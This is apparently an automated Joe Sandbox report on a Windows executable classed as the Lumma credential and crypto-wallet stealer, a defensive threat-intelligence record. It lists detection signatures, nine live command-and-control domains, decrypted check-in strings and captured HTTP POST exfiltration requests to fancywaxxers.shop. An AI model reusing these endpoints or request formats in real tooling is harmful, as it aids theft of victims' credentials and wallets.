Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nayfObR.exe

Overview

General Information

Sample name:nayfObR.exe
Analysis ID:1583755
MD5:138fcf999a87419be2c7e5e036601466
SHA1:7569a1444cd948145c966dbe0b47ffdb587f8681
SHA256:960aa535a9712242c02a82c1f07530ae60e79bcbab15fcf0ebc6e7dbd636710b
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • nayfObR.exe (PID: 6196 cmdline: "C:\Users\user\Desktop\nayfObR.exe" MD5: 138FCF999A87419BE2C7E5E036601466)
    • conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • nayfObR.exe (PID: 6540 cmdline: "C:\Users\user\Desktop\nayfObR.exe" MD5: 138FCF999A87419BE2C7E5E036601466)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["fancywaxxers.shop", "cloudewahsj.shop", "framekgirus.shop", "wholersorie.shop", "noisycuttej.shop", "tirepublicerj.shop", "abruptyopsn.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "7tx2jo--516"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: nayfObR.exe PID: 6540JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: nayfObR.exe PID: 6540JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: nayfObR.exe PID: 6540JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T14:33:57.665182+010020283713Unknown Traffic192.168.2.549704104.21.32.1443TCP
              2025-01-03T14:33:58.596355+010020283713Unknown Traffic192.168.2.549705104.21.32.1443TCP
              2025-01-03T14:33:59.785500+010020283713Unknown Traffic192.168.2.549706104.21.32.1443TCP
              2025-01-03T14:34:01.112954+010020283713Unknown Traffic192.168.2.549707104.21.32.1443TCP
              2025-01-03T14:34:02.251726+010020283713Unknown Traffic192.168.2.549708104.21.32.1443TCP
              2025-01-03T14:34:04.770372+010020283713Unknown Traffic192.168.2.549709104.21.32.1443TCP
              2025-01-03T14:34:13.270327+010020283713Unknown Traffic192.168.2.549710104.21.32.1443TCP
              2025-01-03T14:34:15.612275+010020283713Unknown Traffic192.168.2.549716104.21.32.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T14:33:58.123850+010020546531A Network Trojan was detected192.168.2.549704104.21.32.1443TCP
              2025-01-03T14:33:59.081538+010020546531A Network Trojan was detected192.168.2.549705104.21.32.1443TCP
              2025-01-03T14:34:16.050117+010020546531A Network Trojan was detected192.168.2.549716104.21.32.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T14:33:58.123850+010020498361A Network Trojan was detected192.168.2.549704104.21.32.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T14:33:59.081538+010020498121A Network Trojan was detected192.168.2.549705104.21.32.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T14:33:57.665182+010020586571Domain Observed Used for C2 Detected192.168.2.549704104.21.32.1443TCP
              2025-01-03T14:33:58.596355+010020586571Domain Observed Used for C2 Detected192.168.2.549705104.21.32.1443TCP
              2025-01-03T14:33:59.785500+010020586571Domain Observed Used for C2 Detected192.168.2.549706104.21.32.1443TCP
              2025-01-03T14:34:01.112954+010020586571Domain Observed Used for C2 Detected192.168.2.549707104.21.32.1443TCP
              2025-01-03T14:34:02.251726+010020586571Domain Observed Used for C2 Detected192.168.2.549708104.21.32.1443TCP
              2025-01-03T14:34:04.770372+010020586571Domain Observed Used for C2 Detected192.168.2.549709104.21.32.1443TCP
              2025-01-03T14:34:13.270327+010020586571Domain Observed Used for C2 Detected192.168.2.549710104.21.32.1443TCP
              2025-01-03T14:34:15.612275+010020586571Domain Observed Used for C2 Detected192.168.2.549716104.21.32.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T14:33:57.173114+010020586561Domain Observed Used for C2 Detected192.168.2.5614871.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T14:34:12.365477+010020480941Malware Command and Control Activity Detected192.168.2.549709104.21.32.1443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://fancywaxxers.shop/$Avira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop/apirVAvira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop/EkAvira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop/JkAvira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop/apinkAvira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop/apiR3oRAvira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop/iAvira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop:443/apiMicrosoftAvira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop:443/apisAvira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop/apiokAvira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop/akAvira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop/api7Avira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop/apiJAvira URL Cloud: Label: malware
              Source: https://fancywaxxers.shop:443/api9Avira URL Cloud: Label: malware
              Source: 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["fancywaxxers.shop", "cloudewahsj.shop", "framekgirus.shop", "wholersorie.shop", "noisycuttej.shop", "tirepublicerj.shop", "abruptyopsn.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "7tx2jo--516"}
              Source: nayfObR.exeVirustotal: Detection: 44%Perma Link
              Source: nayfObR.exeReversingLabs: Detection: 39%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.3% probability
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fancywaxxers.shop
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 7tx2jo--516
              Source: nayfObR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: number of queries: 1001
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005BB099 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_005BB099
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005BAFE8 FindFirstFileExW,0_2_005BAFE8

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.5:61487 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49704 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49707 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49708 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49709 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49705 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49706 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49716 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49710 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49716 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.32.1:443
              Source: Malware configuration extractorURLs: fancywaxxers.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: global trafficTCP traffic: 192.168.2.5:64588 -> 1.1.1.1:53
              Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.32.1:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: fancywaxxers.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PL97KM6X4KLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12791Host: fancywaxxers.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PDDNHW1VYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15021Host: fancywaxxers.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PAI49V4K5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20511Host: fancywaxxers.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I0TGGFGD09V4Z2V8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 952Host: fancywaxxers.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6RJDBLF9VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585960Host: fancywaxxers.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: fancywaxxers.shop
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
              Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: nayfObR.exe, 00000003.00000003.2101907540.0000000003103000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.0000000003103000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210129135.0000000003111000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183544269.0000000003103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: nayfObR.exe, nayfObR.exe, 00000003.00000003.2210391409.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183510952.000000000311D000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.00000000030AC000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2102111658.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.000000000311E000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2075511997.000000000593D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
              Source: nayfObR.exe, 00000003.00000003.2064676852.000000000592D000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2064576733.0000000005928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/$
              Source: nayfObR.exe, 00000003.00000003.2051055223.00000000030BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/Ek
              Source: nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/I
              Source: nayfObR.exe, 00000003.00000003.2223148388.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226400428.00000000030C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/Jk
              Source: nayfObR.exe, 00000003.00000003.2064489964.0000000005928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/ak
              Source: nayfObR.exe, nayfObR.exe, 00000003.00000003.2210535065.0000000003120000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2192173984.000000000592B000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2075834221.0000000005944000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2102111658.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003120000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2075511997.0000000005943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 